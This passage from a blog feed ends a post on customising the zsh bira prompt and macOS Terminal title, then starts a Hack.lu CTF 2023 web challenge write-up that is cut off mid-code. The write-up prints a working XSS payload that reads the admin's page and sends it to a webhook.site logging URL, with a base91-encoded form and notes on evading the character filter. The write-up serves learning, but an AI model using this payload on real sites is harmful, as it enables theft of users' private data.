&lt;p&gt;Or at least that’s what they claim in this article! What would be the result for my &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;zsh&lt;/code&gt; config then?&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-06/image.png&quot; alt=&quot;echo PS1 result&quot; /&gt;&lt;/p&gt;

&lt;p&gt;As you can see, it’s much more complicated. It contains some ruby, git configs, line break and more. We’re interested in the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;%n&lt;/code&gt; which represents &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;$USERNAME&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;%m&lt;/code&gt; - hostname. These and many more variables are pretty well documented in the &lt;a href=&quot;https://zsh.sourceforge.io/Doc/Release/Prompt-Expansion.html&quot;&gt;zsh prompt expansion&lt;/a&gt; docs. So let’s try to replace this value with some custom string!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-06/image-4.png&quot; alt=&quot;customized PS1 in zsh&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And if you didn’t forget to wrap the variable in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&quot;&quot;&lt;/code&gt; you should get something like this. There’s just one issue. &lt;strong&gt;Where are the colors?!&lt;/strong&gt; 😱 See this green bar, it’s now white, but it’s not only that, we’ve also lost the folder colors. This is awful 🤢 We went this far, and still, we need more googling!&lt;/p&gt;

&lt;p&gt;I was really close to start reading the official &lt;a href=&quot;https://zsh.sourceforge.io/Doc/Release/&quot;&gt;zsh docs&lt;/a&gt;. As a side note, I also found this very nice &lt;a href=&quot;https://github.com/rothgar/mastering-zsh/tree/master&quot;&gt;zsh intro&lt;/a&gt;. This was the moment when I thought, &lt;em&gt;why not look at the theme itself&lt;/em&gt;? And &lt;a href=&quot;https://github.com/ohmyzsh/ohmyzsh/blob/master/themes/bira.zsh-theme&quot;&gt;here it is&lt;/a&gt;, my lovely bira theme! And what we’ve got here, the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PROMPT&lt;/code&gt; variable and the&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;user_host&lt;/code&gt;!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-06/image-5.png&quot; alt=&quot;bira config from github&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We can now fork this config and create our custom theme with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;user_host&lt;/code&gt; replaced 🎉, but wait, wait, not so fast. We’re a bit too lazy for that, aren’t we? Why not copy-pasting these two lines to to our &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.zshrc&lt;/code&gt; and see what happens? It’s just a config, isn’t it? Should work out of the box, am I right? 🤔 Let’s add these it at the very end of the file&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nb&quot;&gt;local &lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;user_host&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;%B%(!.%{&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$fg&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;[red]%}.%{&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$fg&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;[green]%})buy@me-aCoffee%{&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$reset_color&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;%} &quot;&lt;/span&gt;
&lt;span class=&quot;nv&quot;&gt;PROMPT&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;╭─&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;user_host&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;current_dir&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;rvm_ruby&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;vcs_branch&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;venv_prompt&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;
╰─%B&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;user_symbol&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;%b &quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;and we’ve got it! Fully coloured, and no custom theme 🎉&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-06/image-6.png&quot; alt=&quot;final result&quot; width=&quot;300&quot; /&gt;&lt;/p&gt;

&lt;p&gt;There’s last thing to do. We’ve changed the cli prop, but we also need to change the very top terminal title which still includes my name and surname.&lt;/p&gt;

&lt;p&gt;I started changing the title in the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Terminal-&amp;gt;Settings-&amp;gt;Profiles-&amp;gt;Window-&amp;gt;Title&lt;/code&gt;, but this title was overwritten straightway, every time I opened a new Terminal window.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-06/image-8.png&quot; alt=&quot;macos Terminal settings&quot; width=&quot;600&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Did you know you can open the terminal inspector via &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;command + shift + I&lt;/code&gt;? I didn’t up until now! Sadly, it was pointless, because the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;title&lt;/code&gt; was automatically updated back to what it was after I entered the first &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cd&lt;/code&gt; command. What a pain in the ass!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2024-01-06/image-9.png&quot; alt=&quot;Terminal inspector&quot; /&gt;&lt;/p&gt;

&lt;p&gt;At least we know it’s related to the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;zsh&lt;/code&gt; and that you can change the terminal title from the cli. I finally found some hints pointing back to the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.zshrc&lt;/code&gt; file. And in this, the holy grail, the commented out &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;DISABLE_AUTO_TITLE=&quot;true&quot;&lt;/code&gt; with some explanation for brainless folks like me&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;c&quot;&gt;# Uncomment the following line to disable auto-setting terminal title.&lt;/span&gt;
&lt;span class=&quot;nv&quot;&gt;DISABLE_AUTO_TITLE&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;true&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Wonderful, so all it’s left is to turn off your terminal or type &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;source ~/.zshrc&lt;/code&gt; to update the current terminal session. Voilà!&lt;/p&gt;

&lt;h4 id=&quot;-tldr&quot;&gt;&lt;a id=&quot;tldr&quot;&gt;&lt;/a&gt; TLDR&lt;/h4&gt;

&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;To disable macos Terminal title auto update by zsh, uncomment &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;DISABLE_AUTO_TITLE&lt;/code&gt; from your &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.zshrc&lt;/code&gt; file&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;To change zsh cli prompt title add these two lines to your &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.zshrc&lt;/code&gt; file&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nb&quot;&gt;local &lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;user_host&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;%B%(!.%{&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$fg&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;[red]%}.%{&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$fg&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;[green]%})buy@me-aCoffee%{&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$reset_color&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;%} &quot;&lt;/span&gt;
&lt;span class=&quot;nv&quot;&gt;PROMPT&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;╭─&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;user_host&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;current_dir&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;rvm_ruby&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;vcs_branch&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;venv_prompt&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;
╰─%B&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;user_symbol&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;%b &quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;!-- &lt;hr style=&quot;margin: 16px 0px 16px 0px&quot; /&gt; --&gt;
&lt;!-- &lt;script
id=&quot;diffblog-plugin-script&quot;
async=&quot;false&quot;
src=&quot;https://diff.blog/static/js/diffblog_plugin_v1.js&quot;
&gt;&lt;/script&gt;
&lt;script&gt;
document
.getElementById(&quot;diffblog-plugin-script&quot;)
.addEventListener(&quot;load&quot;, function () {
DiffBlog(&quot;l1hwfdcilg3r3t2hu2zoqweyod5ktr52272hdhm4rye43zyr1p&quot;);
});
&lt;/script&gt; --&gt;

&lt;script&gt;
  // Set utterances theme based on current theme
  (function () {
    function getUtterancesTheme() {
      var theme = localStorage.getItem(&apos;theme&apos;) || &apos;auto&apos;;
      var utterancesTheme;

      if (theme === &apos;dark&apos;) {
        utterancesTheme = &apos;github-dark&apos;;
      } else if (theme === &apos;light&apos;) {
        utterancesTheme = &apos;github-light&apos;;
      } else {
        // Auto mode - check system preference
        if (
          window.matchMedia &amp;&amp;
          window.matchMedia(&apos;(prefers-color-scheme: dark)&apos;).matches
        ) {
          utterancesTheme = &apos;github-dark&apos;;
        } else {
          utterancesTheme = &apos;github-light&apos;;
        }
      }
      return utterancesTheme;
    }

    var utterancesTheme = getUtterancesTheme();

    var script = document.createElement(&apos;script&apos;);
    script.src = &apos;https://utteranc.es/client.js&apos;;
    script.setAttribute(&apos;repo&apos;, &apos;robi24/robi24.github.io&apos;);
    script.setAttribute(&apos;issue-term&apos;, &apos;pathname&apos;);
    script.setAttribute(&apos;theme&apos;, utterancesTheme);
    script.setAttribute(&apos;crossorigin&apos;, &apos;anonymous&apos;);
    script.async = true;

    // Listen for utterances ready event
    window.addEventListener(&apos;message&apos;, function (event) {
      if (event.origin !== &apos;https://utteranc.es&apos;) return;

      // When utterances loads, immediately update theme
      var iframe = document.querySelector(&apos;.utterances-frame&apos;);
      if (iframe) {
        var currentTheme = getUtterancesTheme();
        var message = {
          type: &apos;set-theme&apos;,
          theme: currentTheme,
        };
        iframe.contentWindow.postMessage(message, &apos;https://utteranc.es&apos;);
      }
    });

    var container = document.getElementById(&apos;utterances-container&apos;);
    if (container) {
      container.appendChild(script);
    }
  })();
&lt;/script&gt;

&lt;div id=&quot;utterances-container&quot;&gt;&lt;/div&gt;

&lt;script async=&quot;&quot; src=&quot;https://www.googletagmanager.com/gtag/js?id=G-4SN4JSS2WD&quot;&gt;&lt;/script&gt;

&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag() {
    dataLayer.push(arguments);
  }
  gtag(&apos;js&apos;, new Date());
  gtag(&apos;config&apos;, &apos;G-4SN4JSS2WD&apos;);
&lt;/script&gt;

</description>
				<pubDate>Sat, 06 Jan 2024 16:00:00 +0000</pubDate>
				<link>https://bitwornhat.com/posts/zsh-bira-theme-custom-prompt</link>
				<guid isPermaLink="true">https://bitwornhat.com/posts/zsh-bira-theme-custom-prompt</guid>
			</item>
		
			<item>
				<title>Hack.lu CTF based encoding web challenge writeup</title>
				<description>&lt;h2 id=&quot;based-encoding&quot;&gt;Based Encoding&lt;/h2&gt;

&lt;p&gt;CTF name: &lt;strong&gt;&lt;a href=&quot;https://flu.xxx/info&quot;&gt;Hack.lu CTF 2023&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Challenge name: &lt;strong&gt;Based Encoding&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Challenge description:&lt;/p&gt;

&lt;div class=&quot;language-text highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Based encoding as a service. But can we insert a little tomfoolery? Let&apos;s find out.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Challenge category: &lt;strong&gt;web&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Challenge points: &lt;strong&gt;82&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When: &lt;strong&gt;Fri, Oct. 13, 18:00 — Sun, Oct. 15, 18:00 UTC&lt;/strong&gt;&lt;/p&gt;

&lt;h3 id=&quot;tldr---solution&quot;&gt;TLDR - solution&lt;/h3&gt;

&lt;p&gt;report a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;base91&lt;/code&gt; encoded &lt;em&gt;note&lt;/em&gt; to admin (&lt;strong&gt;XSS&lt;/strong&gt; with a limited character set)&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;c1&quot;&gt;# btoa(&quot;https://webhook.site/your-server?data=&quot;) ==&amp;gt; aHR0cHM6Ly93ZWJob29rLnNpdGUveW91ci1zZXJ2ZXI/ZGF0YT0=
&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;script&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&amp;lt;script&amp;gt;fetch(&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;)[&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;]((data) =&amp;gt; data[&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;]())[&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;]((html)=&amp;gt;location=atob(&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;aHR0cHM6Ly93ZWJob29rLnNpdGUveW91ci1zZXJ2ZXI/ZGF0YT0=&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;)+btoa(html))&amp;lt;/script&amp;gt;&amp;lt;p&amp;gt;some tag&amp;lt;/p&amp;gt;&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;result&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;based91&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;decode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;script&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;result&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;hex&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;())&lt;/span&gt;

&lt;span class=&quot;c1&quot;&gt;# f0afecd5baf39dac4294fc6dd286f809445ffb0db053e0adb4964677a7ca80e53c0b26c6157004c3e127107ded37c04e814160531bdd758d4365402d67b83360700a022f45a3cc14aa343a2acff513e49aa6e1436fa0ee472443f8433165989534423bd308ede71d1128b3cde436c4dfa9ccad5f10d8d4e0f08f0651410c054aedf14de6a0d55a22d9dcce
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;description&quot;&gt;Description&lt;/h3&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-1.png&quot; alt=&quot;description&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Challenge was marked as &lt;strong&gt;beginner friendly&lt;/strong&gt;. You’re greet with a login page. After signing up you get an access to list, create and report (to admin) &lt;em&gt;encodings&lt;/em&gt;&lt;/p&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;login&lt;/th&gt;
      &lt;th&gt;create&lt;/th&gt;
      &lt;th&gt;view&lt;/th&gt;
      &lt;th&gt;list&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td&gt;&lt;img src=&quot;/assets/images/2023-10-19/image.png&quot; alt=&quot;login page&quot; /&gt;&lt;/td&gt;
      &lt;td&gt;&lt;img src=&quot;/assets/images/2023-10-19/t1.png&quot; alt=&quot;create encoding&quot; /&gt;&lt;/td&gt;
      &lt;td&gt;&lt;img src=&quot;/assets/images/2023-10-19/t2.png&quot; alt=&quot;view encoding&quot; /&gt;&lt;/td&gt;
      &lt;td&gt;&lt;img src=&quot;/assets/images/2023-10-19/t3.png&quot; alt=&quot;list all encodings&quot; /&gt;&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;After checking the source code and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;view_encoding.html&lt;/code&gt; file we can see that it’s vulnerable to XSS&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-5.png&quot; alt=&quot;Alt text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Inside the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;app.py&lt;/code&gt; file you find a flag. It’s in a database, but only admin knows the id. So the idea is to prepare an encoding with some XSS, report it to the admin, steal the id and get the flag 😉&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-7.png&quot; alt=&quot;Alt text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Our &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;XSS&lt;/code&gt; script will be encoded using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;base91&lt;/code&gt; which means we’re limited to the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;base91_alphabet&lt;/code&gt;. Other characters will be lost during encoding process&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/2023-10-19/image-6.png&quot; alt=&quot;Alt text&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Let’s analyze the most important file of this challenge. Inside the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;app.py&lt;/code&gt; there’s the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/create&lt;/code&gt; function where we find the encoding logic&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;n&quot;&gt;encoded&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;based91&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;not&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;re&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;match&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;sa&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;^[a-f0-9]+$&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;ow&quot;&gt;and&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;bytes&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;fromhex&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;First observation is that you can send encodings as a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.hex()&lt;/code&gt;. Second is that encoding a decoded value will give you the same value (but again, we’re limited to the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;base91_alphabet&lt;/code&gt;)&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;n&quot;&gt;result&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;based91&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;based91&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;decode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&apos;YOUR_EVIL_SCRIPT_but_._and_ _spaces_ _are_missing&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;))&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;result&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;c1&quot;&gt;# YOUR_EVIL_SCRIPT_but__and__spaces__are_missisB
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now it’s time to prepare a JS script which will steal the admin decodings. Remember we can’t use spaces and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.&lt;/code&gt; so we need to access the object using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;[]&lt;/code&gt;. Let’s fetch &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/&lt;/code&gt;, then redirect a user to our server with the page data as a query parameter. We used &lt;a href=&quot;https://webhook.site&quot;&gt;webhook.site&lt;/a&gt; as a temporary log server&lt;/p&gt;

&lt;div class=&quot;language-javascript highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;c1&quot;&gt;// btoa(&quot;https://webhook.site/your-server?data=&quot;) ==&amp;gt; aHR0cHM6Ly93ZWJob29rLnNpdGUveW91ci1zZXJ2ZXI/ZGF0YT0=&lt;/span&gt;

&lt;span class=&quot;nx&quot;&gt;fetch&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]((&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;text&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]())&lt;/span&gt;
  &lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;dl&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;](&lt;/span&gt;
